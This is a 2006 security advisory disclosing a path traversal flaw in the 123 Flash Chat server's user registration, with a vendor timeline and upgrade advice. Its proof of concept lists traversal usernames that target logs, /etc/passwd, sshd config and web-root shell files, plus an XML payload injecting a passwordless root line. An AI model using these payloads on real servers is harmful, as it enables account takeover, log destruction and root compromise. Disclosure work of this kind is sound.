Original release date: January 09, 2006
Last revised: January 13, 2006
Discovered by: Jesus Olmos Gonzalez
123 Flash Chat is a full featured java chat server and flash chat client, the product homepage is www.123flashchat.com and it is possible to test it at:
The chat server has a user-register functionality, that can be enabled by the following sentence:
By default it is enabled and anybody can create a chat account.
The register form ask the following questions:
username, password, repeat-password and email.
When a user creates an account, a file is created at members directory:
The user file has the following structure:
field size null parse example
username 32 no (allow transversal ../) ../room_1.txt
password 32 no allow all 123
repeat-pass 32 no allow all 123
email 128 yes /^.+@.+\..+$/aa firstname.lastname@example.org
Username field allow anybody to create a file in our system, with same priviledges as the server and almost arbitrary content.
This is dangerous becouse, a user can get others account, erase logs, modify the server's /etc/passwd or modify other config files.
PROOF OF CONCEPT
In the exploitation, there are two factors, WHERE and WHAT.
The username vector is WHERE, and WHAT can be:
2) email address if we need more bytes
|../../../../logs/access.log erase logs.
../../../../logs/error.log erase logs.
../default/logs/access.log erase logs.
../members/parker change parker's password, if now we login with parker user, he will be disconected.
../../../../../../../etc/passwd if server run as root.
../../../../etc/ssh/sshd.conf if server run as root.
../../../../../var/log/messages if server run as root.
../../../../var/www/htdocs/x.php try to build a shell.
../../../etc/groups/default.xml create an admin account by or other config settings.
../../../fcserver.sh try to replace the script.
It is possible to replace the existent files, to make a DoS, to erase logs, to create/change system accounts, to get other chat user/admin accounts or to make other effects in server's system.
*Possible* remote execution if some config file is modified.
Is it possible to hijack and modify the raw command, to inyect line feed (0x0a) or other characters to construct arbitrary content of the created/overwrited file.
|<?xml version="1.0" encoding="UTF-8"?>
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"
/etc/passwd will be:
If the server is Windows, is it possible to get execution.
The chat service can be crashed or compromissed remotelly.
This vulnerability affects the 123flaschat server up to 5.1 (released on Dec 22, 2005)
123flaschat server 5.1
123flaschat server 5.0
Upgrade to newer version.
This vulnerability has been discovered and reported by
Jesús Olmos González (jolmos (at) isecauditors (dot) com).
January 09, 2006: Initial release.
January 13, 2006: Vendor response actualization.
January 04, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com)
January 09, 2006 Initial vendor notification sent.
January 10, 2006 Quick response, Version 5.1_2 was released.
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.